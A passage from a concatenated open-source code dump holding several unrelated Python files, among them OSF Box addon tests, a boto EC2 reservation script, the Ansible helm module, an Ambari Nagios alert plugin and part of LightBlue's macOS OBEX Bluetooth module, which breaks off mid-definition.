show_process = multiprocessing.Process(target=show_loop,args=(pipe_child, shared_dict))
show_process.start()
cam_process.join()
show_process.join()
if shared_dict['done'] == 1:
pipe_child.close()
pipe_parent.close()
def cam_loop(pipe_parent, shared_dict, orig_video_file):
print("cam", orig_video_file)
cap = cv2.VideoCapture(orig_video_file)
fc = 0
while True:
_ , frame = cap.read()
if frame is None:
print ("done")
shared_dict['done'] = 1
#sys.exit(1)
else:
print ("FRAME: ", fc)
pipe_parent.send(frame)
fc = fc + 1
def show_loop(pipe_child, shared_dict):
while True:
frame = pipe_child.recv()
print("show")
file = sys.argv[1]
main(file)
| gpl-3.0 |
pattisdr/osf.io | addons/box/tests/test_models.py | 32 | 1889 | import mock
import unittest
import pytest
from addons.base.tests.models import OAuthAddonNodeSettingsTestSuiteMixin
from addons.base.tests.models import OAuthAddonUserSettingTestSuiteMixin
from addons.box.models import NodeSettings
from addons.box.tests import factories
pytestmark = pytest.mark.django_db
class TestBoxNodeSettings(OAuthAddonNodeSettingsTestSuiteMixin, unittest.TestCase):
full_name = 'Box'
short_name = 'box'
ExternalAccountFactory = factories.BoxAccountFactory
NodeSettingsClass = NodeSettings
NodeSettingsFactory = factories.BoxNodeSettingsFactory
UserSettingsFactory = factories.BoxUserSettingsFactory
def setUp(self):
self.mock_data = mock.patch.object(
NodeSettings,
'_folder_data',
return_value=('12235', '/Foo')
)
self.mock_data.start()
super(TestBoxNodeSettings, self).setUp()
def tearDown(self):
self.mock_data.stop()
super(TestBoxNodeSettings, self).tearDown()
def test_folder_defaults_to_none(self):
node_settings = NodeSettings(user_settings=self.user_settings, owner=factories.ProjectFactory())
node_settings.save()
assert node_settings.folder_id is None
@mock.patch('addons.box.models.Provider.refresh_oauth_key')
def test_serialize_credentials(self, mock_refresh):
mock_refresh.return_value = True
super(TestBoxNodeSettings, self).test_serialize_credentials()
@mock.patch('addons.box.models.UserSettings.revoke_remote_oauth_access', mock.PropertyMock())
def test_complete_has_auth_not_verified(self):
super(TestBoxNodeSettings, self).test_complete_has_auth_not_verified()
class TestBoxUserSettings(OAuthAddonUserSettingTestSuiteMixin, unittest.TestCase):
full_name = 'Box'
short_name = 'box'
ExternalAccountFactory = factories.BoxAccountFactory
| apache-2.0 |
codecollision/Gamedex-Backend | boto/ec2/buyreservation.py | 56 | 3813 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto.ec2
from boto.sdb.db.property import StringProperty, IntegerProperty
from boto.manage import propget
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge', 'm2.xlarge',
'm2.2xlarge', 'm2.4xlarge', 'cc1.4xlarge',
't1.micro']
class BuyReservation(object):
def get_region(self, params):
if not params.get('region', None):
prop = StringProperty(name='region', verbose_name='EC2 Region',
choices=boto.ec2.regions)
params['region'] = propget.get(prop, choices=boto.ec2.regions)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get(self, params):
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
if __name__ == "__main__":
obj = BuyReservation()
params = {}
obj.get(params)
offerings = obj.ec2.get_all_reserved_instances_offerings(instance_type=params['instance_type'],
availability_zone=params['zone'].name)
print '\nThe following Reserved Instances Offerings are available:\n'
for offering in offerings:
offering.describe()
prop = StringProperty(name='offering', verbose_name='Offering',
choices=offerings)
offering = propget.get(prop)
print '\nYou have chosen this offering:'
offering.describe()
unit_price = float(offering.fixed_price)
total_price = unit_price * params['quantity']
print '!!! You are about to purchase %d of these offerings for a total of $%.2f !!!' % (params['quantity'], total_price)
answer = raw_input('Are you sure you want to do this? If so, enter YES: ')
if answer.strip().lower() == 'yes':
offering.purchase(params['quantity'])
else:
print 'Purchase cancelled'
| bsd-3-clause |
baruch/diskscan | libscsicmd/structs/ata_struct_2_h.py | 1 | 2491 | #!/usr/bin/env python
import sys
import yaml
def emit_func_bit(name, field, params):
bit_params = dict(name=name, field=field, word=int(params[0]), bit=int(params[1]))
print("""static inline bool ata_get_%(name)s_%(field)s(const unsigned char *buf) {
ata_word_t val = ata_get_word(buf, %(word)d);
return val & (1 << %(bit)d);
}
""" % bit_params)
def emit_func_bits(name, field, params):
bit_params = dict(name=name, field=field, word=int(params[0]), start_bit=int(params[1]), end_bit=int(params[2]))
print("""static inline unsigned ata_get_%(name)s_%(field)s(const unsigned char *buf) {
ata_word_t val = ata_get_word(buf, %(word)d);
return (val >> %(start_bit)d) & ((1<<(%(end_bit)d - %(start_bit)d + 1)) - 1);
}
""" % bit_params)
def emit_func_string(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params[0]), word_end=int(params[1]))
print("""static inline void ata_get_%(name)s_%(field)s(const unsigned char *buf, char *out) {
ata_get_string(buf, %(word_start)d, %(word_end)d, out);
}
""" % bit_params)
def emit_func_longword(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params))
print("""static inline ata_longword_t ata_get_%(name)s_%(field)s(const unsigned char *buf) {
return ata_get_longword(buf, %(word_start)d);
}
""" % bit_params)
def emit_func_qword(name, field, params):
bit_params = dict(name=name, field=field, word_start=int(params))
print("""static inline ata_qword_t ata_get_%(name)s_%(field)s(const unsigned char *buf) {
return ata_get_qword(buf, %(word_start)d);
}
""" % bit_params)
kinds = {
'bit': emit_func_bit,
'bits': emit_func_bits,
'string': emit_func_string,
'longword': emit_func_longword,
'qword': emit_func_qword,
}
def emit_header_single(name, struct):
for field, info in list(struct.items()):
keys = list(info.keys())
assert(len(keys) == 1)
kind = keys[0]
params = info[kind]
kinds[kind](name, field, params)
def emit_header(structs):
for name, struct in list(structs.items()):
emit_header_single(name, struct)
def emit_prefix():
print('/* Generated file, do not edit */')
print('#ifndef ATA_PARSE_H')
print('#define ATA_PARSE_H')
print('#include "ata.h"')
def emit_suffix():
print('#endif')
def convert_def(filename):
f = open(filename)
structs = yaml.load(f)
f.close()
emit_header(structs)
if __name__ == '__main__':
emit_prefix()
filenames = sys.argv[1:]
for filename in filenames:
convert_def(filename)
emit_suffix()
| gpl-3.0 |
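The script above renders C accessor functions from a YAML field description. A standalone sketch of the `bits` case (the template text mirrors `emit_func_bits`; the word and bit numbers are illustrative):

```python
TEMPLATE = """static inline unsigned ata_get_%(name)s_%(field)s(const unsigned char *buf) {
\tata_word_t val = ata_get_word(buf, %(word)d);
\treturn (val >> %(start)d) & ((1 << (%(end)d - %(start)d + 1)) - 1);
}"""

def emit_bits(name, field, word, start, end):
    # Render one C getter that extracts bits [start..end] of 16-bit word `word`.
    return TEMPLATE % dict(name=name, field=field, word=word,
                           start=start, end=end)

print(emit_bits("identify", "rotation_rate", 217, 0, 15))
```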
ryfeus/lambda-packs | pytorch/source/caffe2/python/layers/blob_weighted_sum.py | 1 | 2364 | ## @package BlobWeightedSum
# Module caffe2.python.layers.blob_weighted_sum
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import schema
from caffe2.python.layers.layers import ModelLayer
class BlobWeightedSum(ModelLayer):
"""
This layer implements the weighted sum:
weighted element-wise sum of input blobs.
"""
def __init__(
self,
model,
input_record,
init_weights=None,
weight_optim=None,
name='blob_weighted_sum',
**kwargs
):
super(BlobWeightedSum, self).__init__(model, name, input_record, **kwargs)
self.blobs = self.input_record.field_blobs()
self.num_weights = len(self.blobs)
assert self.num_weights > 1, (
"BlobWeightedSum expects more than one input blobs"
)
assert len(input_record.field_types()[0].shape) > 0, (
"BlobWeightedSum expects limited dimensions of the input tensor"
)
assert all(
input_record.field_types()[0].shape == input_record.field_types()[i].shape
for i in range(1, self.num_weights)
), "Shape of input blobs should be the same shape {}".format(
input_record.field_types()[0].shape
)
if init_weights:
assert self.num_weights == len(init_weights), (
"the size of init_weights should be the same as input blobs, "
"expects {}, got {}".format(self.num_weights, len(init_weights))
)
else:
init_weights = [1.0] * self.num_weights
self.weights = [
self.create_param(
param_name="w_{}".format(idx),
shape=[1],
initializer=('ConstantFill', {'value': float(init_weights[idx])}),
optimizer=weight_optim
) for idx in range(self.num_weights)
]
self.output_schema = schema.Scalar(
input_record.field_types()[0],
self.get_next_blob_reference('blob_weighted_sum_out')
)
def add_ops(self, net):
net.WeightedSum(
[x for pair in zip(self.blobs, self.weights) for x in pair],
self.output_schema(),
grad_on_w=True,
)
| mit |
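Numerically, the layer above computes an element-wise sum of equal-shape inputs, each scaled by its own learned scalar weight. A pure-Python sketch of that operation (plain lists stand in for Caffe2 blobs; the weights would normally be trained parameters):

```python
def blob_weighted_sum(blobs, weights):
    # Element-wise: out[i] = sum_k weights[k] * blobs[k][i]
    assert len(blobs) == len(weights) and len(blobs) > 1
    assert all(len(b) == len(blobs[0]) for b in blobs)
    return [sum(w * b[i] for b, w in zip(blobs, weights))
            for i in range(len(blobs[0]))]

print(blob_weighted_sum([[1.0, 2.0], [10.0, 20.0]], [0.5, 0.25]))
# -> [3.0, 6.0]
```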
andmos/ansible | lib/ansible/modules/cloud/misc/helm.py | 50 | 5389 | #!/usr/bin/python
# (c) 2016, Flavio Percoco <flavio@redhat.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: helm
short_description: Manages Kubernetes packages with the Helm package manager
version_added: "2.4"
author: "Flavio Percoco (@flaper87)"
description:
- Install, upgrade, delete and list packages with the Helm package manager.
requirements:
- "pyhelm"
- "grpcio"
options:
host:
description:
- Tiller's server host.
default: "localhost"
port:
description:
- Tiller's server port.
default: 44134
namespace:
description:
- Kubernetes namespace where the chart should be installed.
default: "default"
name:
description:
- Release name to manage.
state:
description:
- Whether to install C(present), remove C(absent), or purge C(purged) a package.
choices: ['absent', 'purged', 'present']
default: "present"
chart:
description: |
A map describing the chart to install. See examples for available options.
default: {}
values:
description:
- A map of value options for the chart.
default: {}
disable_hooks:
description:
- Whether to disable hooks during the uninstall process.
type: bool
default: 'no'
'''
RETURN = ''' # '''
EXAMPLES = '''
- name: Install helm chart
helm:
host: localhost
chart:
name: memcached
version: 0.4.0
source:
type: repo
location: https://kubernetes-charts.storage.googleapis.com
state: present
name: my-memcached
namespace: default
- name: Uninstall helm chart
helm:
host: localhost
state: absent
name: my-memcached
- name: Install helm chart from a git repo
helm:
host: localhost
chart:
source:
type: git
location: https://github.com/user/helm-chart.git
state: present
name: my-example
namespace: default
- name: Install helm chart from a git repo specifying path
helm:
host: localhost
chart:
source:
type: git
location: https://github.com/helm/charts.git
path: stable/memcached
state: present
name: my-memcached
namespace: default
'''
try:
import grpc
from pyhelm import tiller
from pyhelm import chartbuilder
HAS_PYHELM = True
except ImportError as exc:
HAS_PYHELM = False
from ansible.module_utils.basic import AnsibleModule
def install(module, tserver):
changed = False
params = module.params
name = params['name']
values = params['values']
chart = module.params['chart']
namespace = module.params['namespace']
chartb = chartbuilder.ChartBuilder(chart)
r_matches = (x for x in tserver.list_releases()
if x.name == name and x.namespace == namespace)
installed_release = next(r_matches, None)
if installed_release:
if installed_release.chart.metadata.version != chart['version']:
tserver.update_release(chartb.get_helm_chart(), False,
namespace, name=name, values=values)
changed = True
else:
tserver.install_release(chartb.get_helm_chart(), namespace,
dry_run=False, name=name,
values=values)
changed = True
return dict(changed=changed)
def delete(module, tserver, purge=False):
changed = False
params = module.params
if not module.params['name']:
module.fail_json(msg='Missing required field name')
name = module.params['name']
disable_hooks = params['disable_hooks']
try:
tserver.uninstall_release(name, disable_hooks, purge)
changed = True
except grpc._channel._Rendezvous as exc:
if 'not found' not in str(exc):
raise exc
return dict(changed=changed)
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
host=dict(type='str', default='localhost'),
port=dict(type='int', default=44134),
name=dict(type='str', default=''),
chart=dict(type='dict'),
state=dict(
choices=['absent', 'purged', 'present'],
default='present'
),
# Install options
values=dict(type='dict'),
namespace=dict(type='str', default='default'),
# Uninstall options
disable_hooks=dict(type='bool', default=False),
),
supports_check_mode=True)
if not HAS_PYHELM:
module.fail_json(msg="Could not import the pyhelm python module. "
"Please install `pyhelm` package.")
host = module.params['host']
port = module.params['port']
state = module.params['state']
tserver = tiller.Tiller(host, port)
if state == 'present':
rst = install(module, tserver)
elif state == 'absent':
rst = delete(module, tserver)
elif state == 'purged':
rst = delete(module, tserver, True)
module.exit_json(**rst)
if __name__ == '__main__':
main()
| gpl-3.0 |
arenadata/ambari | contrib/nagios-alerts/plugins/ambari_alerts.py | 5 | 1896 | #!/usr/bin/python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import urllib2
import json
import sys
import base64
try:
host = sys.argv[1]
port = sys.argv[2]
cluster = sys.argv[3]
protocol = sys.argv[4]
login = sys.argv[5]
password = base64.b64decode(sys.argv[6])
name = sys.argv[7]
alerts_url = 'api/v1/clusters/{0}/alerts?fields=Alert/label,Alert/service_name,Alert/name,Alert/text,Alert/state&Alert/name={1}'.format(cluster, name)
url = '{0}://{1}:{2}/{3}'.format(protocol, host, port, alerts_url)
admin_auth = base64.encodestring('%s:%s' % (login, password)).replace('\n', '')
request = urllib2.Request(url)
request.add_header('Authorization', 'Basic %s' % admin_auth)
request.add_header('X-Requested-By', 'ambari')
response = urllib2.urlopen(request)
response_body = response.read()
alert = json.loads(response_body)['items'][0]
state = alert['Alert']['state']
text = alert['Alert']['text']
except Exception as exc:
text = 'Unable to retrieve alert info: %s' % exc
state = 'UNKNOWN'
finally:
print text
exit_code = {
'OK': 0,
'WARNING': 1,
'CRITICAL': 2,
'UNKNOWN': 3,
}.get(state, 3)
sys.exit(exit_code)
| apache-2.0 |
m0sia/lightblue-0.4 | src/mac/_obex.py | 83 | 24385 | # Copyright (c) 2009 Bea Lam. All rights reserved.
#
# This file is part of LightBlue.
#
# LightBlue is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LightBlue is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
import datetime
import time
import types
import objc
from Foundation import NSObject, NSDate
from _IOBluetooth import OBEXSession, IOBluetoothDevice, \
IOBluetoothRFCOMMChannel
from _LightAquaBlue import BBBluetoothOBEXClient, BBBluetoothOBEXServer, \
BBStreamingInputStream, BBStreamingOutputStream, \
BBMutableOBEXHeaderSet, \
BBLocalDevice
import _lightbluecommon
import _obexcommon
import _macutil
from _obexcommon import OBEXError
# from <IOBluetooth/OBEX.h>
_kOBEXSuccess = 0
_kOBEXGeneralError = -21850
_kOBEXSessionNotConnectedError = -21876
_kOBEXSessionAlreadyConnectedError = -21882
_kOBEXSessionNoTransportError = -21879
_kOBEXSessionTransportDiedError = -21880
_OBEX_FINAL_MASK = 0x80
_HEADER_MASK = 0xc0
_HEADER_UNICODE = 0x00
_HEADER_BYTE_SEQ = 0x40
_HEADER_1BYTE = 0x80
_HEADER_4BYTE = 0xc0
# public attributes
__all__ = ("OBEXClient", "sendfile", "recvfile")
_obexerrorcodes = { 0: "no error", -21850: "general error", -21851: "no resources", -21852: "operation not supported", -21853: "internal error", -21854: "bad argument", -21855: "timeout", -21856: "bad request", -21857: "cancelled", -21875: "session is busy", -21876: "OBEX session not connected", -21877: "bad request in OBEX session", -21878: "bad response from other party", -21879: "Bluetooth transport not available", -21880: "Bluetooth transport connection died", -21881: "OBEX session timed out", -21882: "OBEX session already connected" }
def errdesc(errorcode):
return _obexerrorcodes.get(errorcode, str(errorcode))
# OBEXSession provides response codes with the final bit set, but OBEXResponse
# class expects the response code to not have the final bit set.
def _cutresponsefinalbit(responsecode):
return (responsecode & ~_OBEX_FINAL_MASK)
def _headersdicttoset(headers):
headerset = BBMutableOBEXHeaderSet.alloc().init()
for header, value in headers.items():
if isinstance(header, types.StringTypes):
hid = _obexcommon._HEADER_STRINGS_TO_IDS.get(header.lower())
else:
hid = header
if hid is None:
raise ValueError("unknown header '%s'" % header)
if isinstance(value, datetime.datetime):
value = value.strftime("%Y%m%dT%H%M%S")
mask = hid & _HEADER_MASK
if mask == _HEADER_UNICODE:
if not isinstance(value, types.StringTypes):
raise TypeError("value for '%s' must be string, was %s" %
(str(header), type(value)))
headerset.setValue_forUnicodeHeader_(value, hid)
elif mask == _HEADER_BYTE_SEQ:
try:
value = buffer(value)
except:
raise TypeError("value for '%s' must be string, array or other buffer type, was %s" % (str(header), type(value)))
headerset.setValue_forByteSequenceHeader_(value, hid)
elif mask == _HEADER_1BYTE:
if not isinstance(value, int):
raise TypeError("value for '%s' must be int, was %s" %
(str(header), type(value)))
headerset.setValue_for1ByteHeader_(value, hid)
elif mask == _HEADER_4BYTE:
if not isinstance(value, int) and not isinstance(value, long):
raise TypeError("value for '%s' must be int, was %s" %
(str(header), type(value)))
headerset.setValue_for4ByteHeader_(value, hid)
if not headerset.containsValueForHeader_(hid):
raise ValueError("cannot set OBEX header value for '%s'" % header)
return headerset
# returns in { header-id: value } form.
def _headersettodict(headerset):
headers = {}
for number in headerset.allHeaders():
hid = number.unsignedCharValue()
mask = hid & _HEADER_MASK
if mask == _HEADER_UNICODE:
value = headerset.valueForUnicodeHeader_(hid)
elif mask == _HEADER_BYTE_SEQ:
value = headerset.valueForByteSequenceHeader_(hid)[:]
if hid == 0x42: # type
if len(value) > 0 and value[-1] == '\0':
value = value[:-1] # remove null byte
elif hid == 0x44: # time iso-8601 string
value = _obexcommon._datetimefromstring(value)
elif mask == _HEADER_1BYTE:
value = headerset.valueFor1ByteHeader_(hid)
elif mask == _HEADER_4BYTE:
value = headerset.valueFor4ByteHeader_(hid)
headers[hid] = value
return headers
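Both conversion helpers above branch on `hid & _HEADER_MASK`: in OBEX, the top two bits of a header identifier select how its value is encoded on the wire. A small sketch of that classification:

```python
# Top two bits of an OBEX header ID select the wire encoding of its value.
HEADER_MASK = 0xc0
ENCODINGS = {
    0x00: "null-terminated unicode",
    0x40: "byte sequence",
    0x80: "1-byte quantity",
    0xc0: "4-byte quantity",
}

def header_encoding(hid):
    return ENCODINGS[hid & HEADER_MASK]

print(header_encoding(0x01))  # Name header   -> unicode
print(header_encoding(0x42))  # Type header   -> byte sequence
print(header_encoding(0xC3))  # Length header -> 4-byte quantity
```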
class OBEXClient(object):
__doc__ = _obexcommon._obexclientclassdoc
def __init__(self, address, channel):
if not _lightbluecommon._isbtaddr(address):
raise TypeError("address '%s' is not a valid bluetooth address"
% address)
if not type(channel) == int:
raise TypeError("channel must be int, was %s" % type(channel))
if channel < 0:
raise ValueError("channel cannot be negative")
self.__serveraddr = (address, channel)
self.__busy = False
self.__client = None
self.__obexsession = None # for testing
#BBBluetoothOBEXClient.setDebug_(True)
def connect(self, headers={}):
if self.__client is None:
if not BBLocalDevice.isPoweredOn():
raise OBEXError(_kOBEXSessionNoTransportError,
"Bluetooth device not available")
self.__delegate = _BBOBEXClientDelegate.alloc().initWithCallback_(
self._finishedrequest)
self.__client = BBBluetoothOBEXClient.alloc().initWithRemoteDeviceAddress_channelID_delegate_(
_macutil.createbtdevaddr(self.__serveraddr[0]),
self.__serveraddr[1], self.__delegate)
if self.__obexsession is not None:
self.__client.performSelector_withObject_("setOBEXSession:",
self.__obexsession)
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendConnectRequestWithHeaders_(headerset)
if r != _kOBEXSuccess:
self.__closetransport()
raise OBEXError(r, "error starting Connect request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
self.__closetransport()
raise OBEXError(self.__error, "error during Connect request (%s)" %
errdesc(self.__error))
resp = self.__getresponse()
if resp.code != _obexcommon.OK:
self.__closetransport()
return resp
def disconnect(self, headers={}):
self.__checkconnected()
self.__reset()
try:
headerset = _headersdicttoset(headers)
r = self.__client.sendDisconnectRequestWithHeaders_(headerset)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Disconnect request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error,
"error during Disconnect request (%s)" %
errdesc(self.__error))
finally:
# close channel regardless of disconnect result
self.__closetransport()
return self.__getresponse()
def put(self, headers, fileobj):
if not hasattr(fileobj, "read"):
raise TypeError("file-like object must have read() method")
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
self.fileobj = fileobj
self.__fileobjdelegate = _macutil.BBFileLikeObjectReader.alloc().initWithFileLikeObject_(fileobj)
self.instream = BBStreamingInputStream.alloc().initWithDelegate_(self.__fileobjdelegate)
self.instream.open()
r = self.__client.sendPutRequestWithHeaders_readFromStream_(
headerset, self.instream)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Put request (%s)" % errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Put request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def delete(self, headers):
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendPutRequestWithHeaders_readFromStream_(headerset,
None)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Delete request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Delete request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def get(self, headers, fileobj):
if not hasattr(fileobj, "write"):
raise TypeError("file-like object must have write() method")
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
delegate = _macutil.BBFileLikeObjectWriter.alloc().initWithFileLikeObject_(fileobj)
outstream = BBStreamingOutputStream.alloc().initWithDelegate_(delegate)
outstream.open()
r = self.__client.sendGetRequestWithHeaders_writeToStream_(
headerset, outstream)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting Get request (%s)" % errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during Get request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def setpath(self, headers, cdtoparent=False, createdirs=False):
self.__checkconnected()
self.__reset()
headerset = _headersdicttoset(headers)
r = self.__client.sendSetPathRequestWithHeaders_changeToParentDirectoryFirst_createDirectoriesIfNeeded_(headerset, cdtoparent, createdirs)
if r != _kOBEXSuccess:
raise OBEXError(r, "error starting SetPath request (%s)" %
errdesc(r))
_macutil.waituntil(self._done)
if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during SetPath request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def _done(self):
return not self.__busy
def _finishedrequest(self, error, response):
if error in (_kOBEXSessionNoTransportError,
_kOBEXSessionTransportDiedError):
self.__closetransport()
self.__error = error
self.__response = response
self.__busy = False
_macutil.interruptwait()
def _setobexsession(self, session):
self.__obexsession = session
# Note that OBEXSession returns kOBEXSessionNotConnectedError if you don't
# send CONNECT before sending any other requests; this means the OBEXClient
# must send connect() before other requests, so this restriction is enforced
# in the Linux version as well, for consistency.
def __checkconnected(self):
if self.__client is None:
raise OBEXError(_kOBEXSessionNotConnectedError,
"must connect() before sending other requests")
def __closetransport(self):
if self.__client is not None:
try:
self.__client.RFCOMMChannel().closeChannel()
self.__client.RFCOMMChannel().getDevice().closeConnection()
except:
pass
self.__client = None
def __reset(self):
self.__busy = True
self.__error = None
self.__response = None
def __getresponse(self):
code = self.__response.responseCode()
rawheaders = _headersettodict(self.__response.allHeaders())
return _obexcommon.OBEXResponse(_cutresponsefinalbit(code), rawheaders)
def __del__(self):
if self.__client is not None:
self.__client.__del__()
super(OBEXClient, self).__del__()
# set method docstrings
definedmethods = locals() # i.e. defined methods in OBEXClient
for name, doc in _obexcommon._obexclientdocs.items():
try:
definedmethods[name].__doc__ = doc
except KeyError:
pass
class _BBOBEXClientDelegate(NSObject):
def initWithCallback_(self, cb_requestdone):
self = super(_BBOBEXClientDelegate, self).init()
self._cb_requestdone = cb_requestdone
return self
initWithCallback_ = objc.selector(initWithCallback_, signature="@@:@")
def __del__(self):
super(_BBOBEXClientDelegate, self).dealloc()
#
# Delegate methods follow. objc signatures for all methods must be set
# using objc.selector or else may get bus error.
#
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishConnectRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishConnectRequestWithError_response_(self, client, error,
response):
self._cb_requestdone(error, response)
client_didFinishConnectRequestWithError_response_ = objc.selector(
client_didFinishConnectRequestWithError_response_, signature="v@:@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishDisconnectRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishDisconnectRequestWithError_response_(self, client,
error, response):
self._cb_requestdone(error, response)
client_didFinishDisconnectRequestWithError_response_ = objc.selector(
client_didFinishDisconnectRequestWithError_response_,signature="v@:@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishPutRequestForStream:(NSInputStream *)inputStream
# error:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishPutRequestForStream_error_response_(self, client,
instream, error, response):
self._cb_requestdone(error, response)
client_didFinishPutRequestForStream_error_response_ = objc.selector(
client_didFinishPutRequestForStream_error_response_,signature="v@:@@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishGetRequestForStream:(NSOutputStream *)outputStream
# error:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishGetRequestForStream_error_response_(self, client,
outstream, error, response):
self._cb_requestdone(error, response)
client_didFinishGetRequestForStream_error_response_ = objc.selector(
client_didFinishGetRequestForStream_error_response_,signature="v@:@@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishSetPathRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishSetPathRequestWithError_response_(self, client, error,
response):
self._cb_requestdone(error, response)
client_didFinishSetPathRequestWithError_response_ = objc.selector(
client_didFinishSetPathRequestWithError_response_, signature="v@:@i@")
# client:didAbortRequestWithStream:error:response: not
# implemented since OBEXClient does not allow abort requests
# ------------------------------------------------------------------
def sendfile(address, channel, source):
if not _lightbluecommon._isbtaddr(address):
raise TypeError("address '%s' is not a valid bluetooth address" %
address)
if not isinstance(channel, int):
raise TypeError("channel must be int, was %s" % type(channel))
if not isinstance(source, types.StringTypes) and \
not hasattr(source, "read"):
raise TypeError("source must be string or file-like object with read() method")
if isinstance(source, types.StringTypes):
headers = {"name": source}
fileobj = file(source, "rb")
closefileobj = True
    else:
        headers = {}
        if hasattr(source, "name"):
            headers = {"name": source.name}
        fileobj = source
        closefileobj = False
client = OBEXClient(address, channel)
client.connect()
try:
resp = client.put(headers, fileobj)
finally:
if closefileobj:
fileobj.close()
try:
client.disconnect()
except:
pass # always ignore disconnection errors
if resp.code != _obexcommon.OK:
        raise OBEXError(resp.code, "server denied the Put request")
# ------------------------------------------------------------------
class BBOBEXObjectPushServer(NSObject):
def initWithChannel_fileLikeObject_(self, channel, fileobject):
if not isinstance(channel, IOBluetoothRFCOMMChannel) and \
not isinstance(channel, OBEXSession):
raise TypeError("internal error, channel is of wrong type %s" %
type(channel))
if not hasattr(fileobject, "write"):
raise TypeError("fileobject must be file-like object with write() method")
self = super(BBOBEXObjectPushServer, self).init()
self.__fileobject = fileobject
self.__server = BBBluetoothOBEXServer.alloc().initWithIncomingRFCOMMChannel_delegate_(channel, self)
#BBBluetoothOBEXServer.setDebug_(True)
self.__error = None
self.__gotfile = False
self.__gotdisconnect = False
self.__disconnected = False
# for internal testing
if isinstance(channel, OBEXSession):
self.__server.performSelector_withObject_("setOBEXSession:",
channel)
return self
initWithChannel_fileLikeObject_ = objc.selector(
